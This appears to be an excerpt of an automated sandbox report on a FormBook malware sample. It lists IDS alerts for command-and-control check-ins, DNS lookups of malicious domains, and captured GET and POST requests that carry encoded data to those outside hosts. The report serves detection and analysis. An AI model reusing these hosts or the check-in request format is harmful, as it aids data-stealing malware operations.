Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49993 -> 203.161.46.205:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49970 -> 163.44.185.183:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49988 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50020 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 104.21.41.74:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50007 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50019 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50005 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50013 -> 172.67.162.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50011 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49997 -> 101.32.205.61:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50018 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 101.32.205.61:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50016 -> 172.67.162.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50022 -> 104.21.4.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 103.21.221.4:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50017 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50012 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50008 -> 13.248.169.48:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.aziziyeescortg.xyz
Source:	DNS query: www.aiactor.xyz
Source:	DNS query: www.optimismbank.xyz

Source: Joe Sandbox View	IP Address: 103.21.221.4 103.21.221.4
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1

Source: Joe Sandbox View

ASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_00684EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00684EB5

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 08:36:31 GMTserver: Apacheset-cookie: __tad=1736584591.3456751; expires=Tue, 09-Jan-2035 08:36:31 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 d1 64 92 71 13 4c 5a f7 20 4a ce 96 ad 91 ed 4c 9f e2 fc 32 71 e8 77 2d 85 f3 07 08 fb b1 b0 0b 3a 83 9d e4 f2 8c c8 f6 da 87 62 9f ab e5 00 53 2d ca 47 4b e9 b3 bb e9 f9 f4 ff da 15 ca 0c 84 a0 fb 04 8c 55 4d 8a ce 0d 1d ff fb 3b 0c 5d 7d 39 72 74 e4 29 86 95 ad b8 d1 10 b0 6b 67 77 a6 5a 5c 5c cf ae d5 fc 1d 9c 80 d1 03 88 69 e3 65 18 d0 ab b5 b2 ad 75 22 be a8 87 15 43 98 58 de ce 86 c5 f3 5a 54 7a 0f 03 57 24 95 f6 ac fe b8 00 63 0d 2e 93 b2 90 d0 38 ac c5 3f e7 37 4c c2 3c 29 3f b6 5a 6d a1 41 87 c3 a0 1a 42 57 e4 92 2f 0e e7 e7 2a c6 8e 6e 8a 0e 89 d3 72 c2 2b bc db e9 bd 88 b9 02 77 be 89 81 07 88 98 28 e2 d9 12 7e dc 7c 15 af 55 7d 1b ee e5 53 62 76 1e 2c 0f 1d 08 7f 85 5f d3 43 7a ee 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?\|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTAP<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/nr+w(~\|U}Sbv,_Cz
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 08:36:34 GMTserver: Apacheset-cookie: __tad=1736584594.5776761; expires=Tue, 09-Jan-2035 08:36:34 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 d1 64 92 71 13 4c 5a f7 20 4a ce 96 ad 91 ed 4c 9f e2 fc 32 71 e8 77 2d 85 f3 07 08 fb b1 b0 0b 3a 83 9d e4 f2 8c c8 f6 da 87 62 9f ab e5 00 53 2d ca 47 4b e9 b3 bb e9 f9 f4 ff da 15 ca 0c 84 a0 fb 04 8c 55 4d 8a ce 0d 1d ff fb 3b 0c 5d 7d 39 72 74 e4 29 86 95 ad b8 d1 10 b0 6b 67 77 a6 5a 5c 5c cf ae d5 fc 1d 9c 80 d1 03 88 69 e3 65 18 d0 ab b5 b2 ad 75 22 be a8 87 15 43 98 58 de ce 86 c5 f3 5a 54 7a 0f 03 57 24 95 f6 ac fe b8 00 63 0d 2e 93 b2 90 d0 38 ac c5 3f e7 37 4c c2 3c 29 3f b6 5a 6d a1 41 87 c3 a0 1a 42 57 e4 92 2f 0e e7 e7 2a c6 8e 6e 8a 0e 89 d3 72 c2 2b bc db e9 bd 88 b9 02 77 be 89 81 07 88 98 28 e2 d9 12 7e dc 7c 15 af 55 7d 1b ee e5 53 62 76 1e 2c 0f 1d 08 7f 85 5f d3 43 7a ee 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?\|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTAP<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/nr+w(~\|U}Sbv,_Cz
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 08:36:37 GMTserver: Apacheset-cookie: __tad=1736584597.8923379; expires=Tue, 09-Jan-2035 08:36:37 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 d1 64 92 71 13 4c 5a f7 20 4a ce 96 ad 91 ed 4c 9f e2 fc 32 71 e8 77 2d 85 f3 07 08 fb b1 b0 0b 3a 83 9d e4 f2 8c c8 f6 da 87 62 9f ab e5 00 53 2d ca 47 4b e9 b3 bb e9 f9 f4 ff da 15 ca 0c 84 a0 fb 04 8c 55 4d 8a ce 0d 1d ff fb 3b 0c 5d 7d 39 72 74 e4 29 86 95 ad b8 d1 10 b0 6b 67 77 a6 5a 5c 5c cf ae d5 fc 1d 9c 80 d1 03 88 69 e3 65 18 d0 ab b5 b2 ad 75 22 be a8 87 15 43 98 58 de ce 86 c5 f3 5a 54 7a 0f 03 57 24 95 f6 ac fe b8 00 63 0d 2e 93 b2 90 d0 38 ac c5 3f e7 37 4c c2 3c 29 3f b6 5a 6d a1 41 87 c3 a0 1a 42 57 e4 92 2f 0e e7 e7 2a c6 8e 6e 8a 0e 89 d3 72 c2 2b bc db e9 bd 88 b9 02 77 be 89 81 07 88 98 28 e2 d9 12 7e dc 7c 15 af 55 7d 1b ee e5 53 62 76 1e 2c 0f 1d 08 7f 85 5f d3 43 7a ee 1c 04 00 00 Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?\|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTAP<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/nr+w(~\|U}Sbv,_Cz

Source: global traffic	HTTP traffic detected: GET /wbcb/?40G=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&I6=x8CX HTTP/1.1Host: www.aziziyeescortg.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /21k5/?I6=x8CX&40G=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW HTTP/1.1Host: www.sankan-fukushi.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /m7wz/?40G=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&I6=x8CX HTTP/1.1Host: www.conansog.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /80gy/?40G=aoPUcaSQDoEYl3Li+4Czyu/3g+fbTJot1NLErCBtTlAsQjsNV1cN7WJnCGjlbK4CrVmsUH1zx16cR6YNnzS2sPuaP2IeA1YIjk+zZLMvVudzffalj3pTsEAkrCqDu4c/9ECDd62vUbZW&I6=x8CX HTTP/1.1Host: www.beythome.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /0kli/?40G=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&I6=x8CX HTTP/1.1Host: www.tempatmudisini06.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /ipd6/?40G=MAf2oATgQW2BddVfADsXf+wCIFqkr7SFGuPP0SlPqjR1OOKK8KBvL1kFaoovUHshjlod7xBKsGH7WboeoPfL5tpttEQTjebBZLDP1C5B1+B2izjL5y+kFvtZcDEbY8V81qhugw9f9kl5&I6=x8CX HTTP/1.1Host: www.questmatch.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /hayl/?40G=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKQFF042Tw+6VIfe83rRo/9u22lJBgGdg0kCVzRF/7zaQBZrR0t81edm/&I6=x8CX HTTP/1.1Host: www.callyur.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /4pih/?40G=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLMq4/O2h+I/bDxqzy5zs+juv0ihYqY4w6XKkyY2pbw+VQr1Zt9gsO1Gc&I6=x8CX HTTP/1.1Host: www.housew.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /lmj1/?40G=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLh6aJBXcpKJnc7knxQojZ5lwIpUW+gGYnH9DbcZ+0LQDmlqLzGDTRmoL&I6=x8CX HTTP/1.1Host: www.nuy25c9t.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /vpqb/?40G=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov6UF8iHhIIfztFuddsJZKZ0jfG27BsUoTTDkyVdJYgiWFcO05IwORcvR&I6=x8CX HTTP/1.1Host: www.madhf.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /0krx/?40G=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwOSNsfSyMlf4rPNeG2/89f69I6MEwndXqV58tlctS1+W0a+BwgVQz/Ju&I6=x8CX HTTP/1.1Host: www.a1shop.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /g2y0/?I6=x8CX&40G=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYFRZeOP0GfhrQZRrSAbT+Kmv6/SRHMYq+Ac5wEC2ErfnaeU3KKMi595E HTTP/1.1Host: www.aiactor.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /arvb/?40G=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//ud7VMWFkg8aHFm5yBkuyjZoE2tjqm34JPZ+m3kLgGiOEtHU69tbM0ur&I6=x8CX HTTP/1.1Host: www.sitioseguro.blogAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Source: global traffic	HTTP traffic detected: GET /lnyv/?40G=JAmImNl6mB+RRlbpbvR3+e423BtxCo3/O8+kCBnAAYB05gHtC1vk8aJbyHyeZvKMcMp3FBCqV/xfRsVXPWDfq3FhSQaZR+yoQaYOzH6/2TfWCxrHn1NtVW9znTjg53+OaSVcYfzv2sfk&I6=x8CX HTTP/1.1Host: www.optimismbank.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)

Source: global traffic	DNS traffic detected: DNS query: www.aziziyeescortg.xyz
Source: global traffic	DNS traffic detected: DNS query: www.grandesofertas.fun
Source: global traffic	DNS traffic detected: DNS query: www.sankan-fukushi.info
Source: global traffic	DNS traffic detected: DNS query: www.conansog.shop
Source: global traffic	DNS traffic detected: DNS query: www.beythome.online
Source: global traffic	DNS traffic detected: DNS query: www.tempatmudisini06.click
Source: global traffic	DNS traffic detected: DNS query: www.questmatch.pro
Source: global traffic	DNS traffic detected: DNS query: www.callyur.shop
Source: global traffic	DNS traffic detected: DNS query: www.housew.website
Source: global traffic	DNS traffic detected: DNS query: www.nuy25c9t.sbs
Source: global traffic	DNS traffic detected: DNS query: www.madhf.tech
Source: global traffic	DNS traffic detected: DNS query: www.a1shop.shop
Source: global traffic	DNS traffic detected: DNS query: www.aiactor.xyz
Source: global traffic	DNS traffic detected: DNS query: www.sitioseguro.blog
Source: global traffic	DNS traffic detected: DNS query: www.optimismbank.xyz
Source: global traffic	DNS traffic detected: DNS query: www.nonpressure.beauty

Source: unknown

HTTP traffic detected: POST /21k5/ HTTP/1.1Host: www.sankan-fukushi.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brConnection: closeContent-Length: 216Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Origin: http://www.sankan-fukushi.infoReferer: http://www.sankan-fukushi.info/21k5/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)Data Raw: 34 30 47 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 77 50 67 70 42 65 7a 5a 47 62 68 43 77 59 4d 64 68 2b 58 77 4a 6b 4d 5a 67 39 6e 34 49 66 79 6f 35 39 37 43 4b 36 45 64 38 67 4e 6f 52 41 37 70 68 35 36 4f 4c 78 46 48 43 37 74 63 46 36 66 47 41 79 73 37 67 53 73 77 57 4f 76 41 49 41 34 37 6b 78 75 46 70 52 74 64 6a 75 65 30 57 74 61 52 53 6a 73 6f 36 55 65 53 57 4b 46 73 66 48 6a 59 59 6c 32 59 65 6f 6a 78 77 4e 49 54 56 30 37 50 4e 4f 72 63 39 4f 73 5a 79 59 6a 6d 45 4e 4c 72 77 79 63 33 30 38 74 52 4d 4b 62 78 6f 48 37 46 36 5a 46 52 42 64 44 30 48 6b 45 46 52 49 51 4b 48 52 66 51 6b 6b 42 74 70 4a 6f 54 55 51 4f 62 31 4b 56 6f 2f 51 3d 3d Data Ascii: 